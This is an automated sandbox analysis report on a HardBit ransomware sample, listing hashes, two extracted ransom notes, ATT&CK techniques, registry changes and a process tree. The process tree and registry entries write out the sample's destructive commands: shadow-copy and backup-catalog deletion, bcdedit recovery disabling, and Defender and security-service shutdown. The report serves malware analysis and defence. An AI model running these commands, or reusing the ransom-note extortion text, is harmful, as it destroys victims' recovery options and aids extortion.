a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992

Resubmissions

28-02-2023 20:04

230228-ytdzksch89 10

04-02-2023 22:36

04-02-2023 22:32

04-02-2023 22:30

04-02-2023 22:15

28-12-2022 14:55

Analysis

max time kernel
107s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2023 22:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Size

333KB
MD5

3191feae778309eb99df4e4e25c62f1a
SHA1

d639821e3fbbb15e14b46aed5b98568e3ce045c3
SHA256

a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992
SHA512

c8d8734bb1d6e413d8b14e73952a4eb42fd5641ca49822db66f87ea7f0c1fb4c2a38232a652a11ca1c3c5564a517a2aaef8fb59fadff36a11afcce60e5d89798
SSDEEP

6144:P1S1JwNbEKcwwZTz2fYNR5OyxyM6qy9iJ4zv5fmRw9aC1oPtYdeAS9aqbGqeBD:9So4KcZbRwyxmf9iWhuw9aCqPtYMH9zs

Score

10^/10

evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\Favorites\Links\How To Restore Your Files.txt

Ransom Note

_ _ _____ ___ ___ ___ _ _____ | | ( )| _ || _ \ ( _ \ ( _ \ (_)(_ _) | |_| || (_) || (_) )| | ) || (_) )| | | | | _ || _ || / | | | || _ ( | | | | | | | || | | || |\ \ | |_) || (_) )| | | | (_) |_||_| |_||_| (_)(____/ (____/ |_| |_| ¦¦¦¦¦HARDBIT RANSOMWARE¦¦¦¦¦ ---- what happened? All your files have been stolen and then encrypted. But don't worry, everything is safe and will be returned to you. ---- How can I get my files back? You have to pay us to get the files back. We don't have bank or paypal accounts, you only have to pay us via Bitcoin. ---- How can I buy bitcoins? You can buy bitcoins from all reputable sites in the world and send them to us. Just search how to buy bitcoins on the internet. Our suggestion is these sites. >>https://www.binance.com/en<< >>https://www.coinbase.com/<< >>https://localbitcoins.com/<< >>https://www.bybit.com/en-US/<< ---- What is your guarantee to restore files? Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. ---- How to contact with you? Or contact us by email:>>[email protected]<< or >>[email protected]<< ---- How will the payment process be after payment? After payment, we will send you the decryption tool along with the guide and we will be with you until the last file is decrypted. ---- What happens if I don't pay you? If you don't pay us, you will never have access to your files because the private key is only in our hands. This transaction is not important to us, but it is important to you, because not only do you not have access to your files, but you also lose time. And the more time passes, the more you will lose and If you do not pay the ransom, we will attack your company again in the future. ---- What are your recommendations? - Never change the name of the files, if you want to manipulate the files, make sure you make a backup of them. If there is a problem with the files, we are not responsible for it. - Never work with intermediary companies, because they charge more money from you. For example, if we ask you for 50,000 dollars, they will tell you 55,000 dollars. Don't be afraid of us, just call us. ---- Very important! For those who have cyber insurance against ransomware attacks. Insurance companies require you to keep your insurance information secret, this is to never pay the maximum amount specified in the contract or to pay nothing at all, disrupting negotiations. The insurance company will try to derail negotiations in any way they can so that they can later argue that you will be denied coverage because your insurance does not cover the ransom amount. For example your company is insured for 10 million dollars, while negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for example 100 thousand dollars, we will refuse the paltry amount and ask for example the amount of 15 million dollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars. He will do anything to derail negotiations and refuse to pay us out completely and leave you alone with your problem. If you told us anonymously that your company was insured for $10 million and other important details regarding insurance coverage, we would not demand more than $10 million in correspondence with the insurance agent. That way you would have avoided a leak and decrypted your information. But since the sneaky insurance agent purposely negotiates so as not to pay for the insurance claim, only the insurance company wins in this situation. To avoid all this and get the money on the insurance, be sure to inform us anonymously about the availability and terms of insurance coverage, it benefits both you and us, but it does not benefit the insurance company. Poor multimillionaire insurers will not starve and will not become poorer from the payment of the maximum amount specified in the contract, because everyone knows that the contract is more expensive than money, so let them fulfill the conditions prescribed in your insurance contract, thanks to our interaction. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Your ID :078BFBFF000306D2, 078BFBFF000306D2 Your Key :O2WRLiccV5giDbjNFDBay6wD45NSwXJRSJSgQv6RupMdTd7L5BNQ64YAo/22ge2+Dk8JUSOfrIZYHwi1YeLX4clbpqHfE39Il/OhF+4cwh9zdnsBpIYdXRue9sfCXyQIRPrQe71mY5jp61SJWn5SYW5HlzhaBGOxGRCX8S5kYmg=

Emails

email:>>[email protected]<<

>>[email protected]<<

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\readme-warning.hta

Ransom Note

All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send your ID for us Our contact information is written in file (HOW TO RESTORE YOUR FILES). Please read this file carefully so as not to make a mistake. You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay Double . We need your ID and your ID is written below the help file Please do not touch the Key written under the help file in any way, otherwise the consequences will be with you Introducing TOX messengers You can download and install TOX message from this link https://tox.chat/ Our ID in TOX: 77A904360EA7D74268E7A4F316865F1703D2D7A6AF28C9ECFACED69CD09C8610FF2C728E6A33. We are ready to answer your questions! If you have information about the company and its servers, share with us in TOX and receive a share from us when they pay. Don't worry, your identity will remain hidden. Is there a guarantee for decryption after payment? Before paying you can send us up to for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) Attention! DO NOT trust anyone except the email and the TOX ID that is in the help file, otherwise we will not be responsible for the consequences. DO NOT rename encrypted files. DO NOT try to decrypt or manipulate the files yourself. Do Not contact intermediary companies. They don't do anything special, they just message us and give us money and get the key, but if our price was $50,000, they will charge $70,000 from you. Do not pay any money for the test file. Before manipulating the files, be sure to make a backup of them, otherwise it is your responsibility.

URLs

https://tox.chat/

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	lsm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Executes dropped EXE 1 IoCs

pid	Process
5416	lsm.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Documents\\hrdb.ico"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HARDBIT.jpg"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4572	sc.exe
10192	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\DefaultIcon	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\DefaultIcon\ = "C:\\Users\\Admin\\Documents\\hrdb.ico"	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Runs net.exe

Runs regedit.exe 1 IoCs

pid	Process
3936	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3936	regedit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5040	WMIC.exe
Token: SeSecurityPrivilege	5040	WMIC.exe
Token: SeTakeOwnershipPrivilege	5040	WMIC.exe
Token: SeLoadDriverPrivilege	5040	WMIC.exe
Token: SeSystemProfilePrivilege	5040	WMIC.exe
Token: SeSystemtimePrivilege	5040	WMIC.exe
Token: SeProfSingleProcessPrivilege	5040	WMIC.exe
Token: SeIncBasePriorityPrivilege	5040	WMIC.exe
Token: SeCreatePagefilePrivilege	5040	WMIC.exe
Token: SeBackupPrivilege	5040	WMIC.exe
Token: SeRestorePrivilege	5040	WMIC.exe
Token: SeShutdownPrivilege	5040	WMIC.exe
Token: SeDebugPrivilege	5040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5040	WMIC.exe
Token: SeRemoteShutdownPrivilege	5040	WMIC.exe
Token: SeUndockPrivilege	5040	WMIC.exe
Token: SeManageVolumePrivilege	5040	WMIC.exe
Token: 33	5040	WMIC.exe
Token: 34	5040	WMIC.exe
Token: 35	5040	WMIC.exe
Token: 36	5040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5040	WMIC.exe
Token: SeSecurityPrivilege	5040	WMIC.exe
Token: SeTakeOwnershipPrivilege	5040	WMIC.exe
Token: SeLoadDriverPrivilege	5040	WMIC.exe
Token: SeSystemProfilePrivilege	5040	WMIC.exe
Token: SeSystemtimePrivilege	5040	WMIC.exe
Token: SeProfSingleProcessPrivilege	5040	WMIC.exe
Token: SeIncBasePriorityPrivilege	5040	WMIC.exe
Token: SeCreatePagefilePrivilege	5040	WMIC.exe
Token: SeBackupPrivilege	5040	WMIC.exe
Token: SeRestorePrivilege	5040	WMIC.exe
Token: SeShutdownPrivilege	5040	WMIC.exe
Token: SeDebugPrivilege	5040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5040	WMIC.exe
Token: SeRemoteShutdownPrivilege	5040	WMIC.exe
Token: SeUndockPrivilege	5040	WMIC.exe
Token: SeManageVolumePrivilege	5040	WMIC.exe
Token: 33	5040	WMIC.exe
Token: 34	5040	WMIC.exe
Token: 35	5040	WMIC.exe
Token: 36	5040	WMIC.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Token: SeIncreaseQuotaPrivilege	4152	WMIC.exe
Token: SeSecurityPrivilege	4152	WMIC.exe
Token: SeTakeOwnershipPrivilege	4152	WMIC.exe
Token: SeLoadDriverPrivilege	4152	WMIC.exe
Token: SeSystemProfilePrivilege	4152	WMIC.exe
Token: SeSystemtimePrivilege	4152	WMIC.exe
Token: SeProfSingleProcessPrivilege	4152	WMIC.exe
Token: SeIncBasePriorityPrivilege	4152	WMIC.exe
Token: SeCreatePagefilePrivilege	4152	WMIC.exe
Token: SeBackupPrivilege	4152	WMIC.exe
Token: SeRestorePrivilege	4152	WMIC.exe
Token: SeShutdownPrivilege	4152	WMIC.exe
Token: SeDebugPrivilege	4152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4152	WMIC.exe
Token: SeRemoteShutdownPrivilege	4152	WMIC.exe
Token: SeUndockPrivilege	4152	WMIC.exe
Token: SeManageVolumePrivilege	4152	WMIC.exe
Token: 33	4152	WMIC.exe
Token: 34	4152	WMIC.exe
Token: 35	4152	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3936	regedit.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5104 wrote to memory of 2156	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	90
PID 5104 wrote to memory of 2156	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	90
PID 5104 wrote to memory of 2156	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	90
PID 2156 wrote to memory of 4572	2156	cmd.exe	92
PID 2156 wrote to memory of 4572	2156	cmd.exe	92
PID 2156 wrote to memory of 4572	2156	cmd.exe	92
PID 5104 wrote to memory of 1304	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	93
PID 5104 wrote to memory of 1304	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	93
PID 5104 wrote to memory of 1304	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	93
PID 5104 wrote to memory of 2148	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	95
PID 5104 wrote to memory of 2148	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	95
PID 5104 wrote to memory of 2148	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	95
PID 2148 wrote to memory of 5040	2148	cmd.exe	97
PID 2148 wrote to memory of 5040	2148	cmd.exe	97
PID 2148 wrote to memory of 5040	2148	cmd.exe	97
PID 5104 wrote to memory of 4948	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	101
PID 5104 wrote to memory of 4948	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	101
PID 5104 wrote to memory of 4948	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	101
PID 5104 wrote to memory of 4636	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	104
PID 5104 wrote to memory of 4636	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	104
PID 5104 wrote to memory of 4636	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	104
PID 5104 wrote to memory of 4284	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	137
PID 5104 wrote to memory of 4284	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	137
PID 5104 wrote to memory of 4284	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	137
PID 5104 wrote to memory of 4300	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	105
PID 5104 wrote to memory of 4300	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	105
PID 5104 wrote to memory of 4300	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	105
PID 5104 wrote to memory of 528	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	136
PID 5104 wrote to memory of 528	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	136
PID 5104 wrote to memory of 528	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	136
PID 5104 wrote to memory of 4732	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	107
PID 5104 wrote to memory of 4732	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	107
PID 5104 wrote to memory of 4732	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	107
PID 5104 wrote to memory of 1388	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	108
PID 5104 wrote to memory of 1388	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	108
PID 5104 wrote to memory of 1388	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	108
PID 5104 wrote to memory of 2440	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	109
PID 5104 wrote to memory of 2440	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	109
PID 5104 wrote to memory of 2440	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	109
PID 5104 wrote to memory of 1376	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	110
PID 5104 wrote to memory of 1376	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	110
PID 5104 wrote to memory of 1376	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	110
PID 5104 wrote to memory of 916	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	111
PID 5104 wrote to memory of 916	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	111
PID 5104 wrote to memory of 916	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	111
PID 5104 wrote to memory of 4016	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	112
PID 5104 wrote to memory of 4016	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	112
PID 5104 wrote to memory of 4016	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	112
PID 5104 wrote to memory of 452	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	113
PID 5104 wrote to memory of 452	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	113
PID 5104 wrote to memory of 452	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	113
PID 5104 wrote to memory of 5000	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	114
PID 5104 wrote to memory of 5000	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	114
PID 5104 wrote to memory of 5000	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	114
PID 5104 wrote to memory of 1272	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	127
PID 5104 wrote to memory of 1272	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	127
PID 5104 wrote to memory of 1272	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	127
PID 4284 wrote to memory of 1492	4284	net.exe	126
PID 4284 wrote to memory of 1492	4284	net.exe	126
PID 4284 wrote to memory of 1492	4284	net.exe	126
PID 5104 wrote to memory of 4520	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	116
PID 5104 wrote to memory of 4520	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	116
PID 5104 wrote to memory of 4520	5104	a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe	116
PID 4300 wrote to memory of 1832	4300	net.exe	125

C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
"C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Windows security modification
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C sc delete VSS
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\SysWOW64\sc.exe
    sc delete VSS
    3⤵
    - Launches sc.exe
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:1304
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  2⤵
  PID:4948
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4300
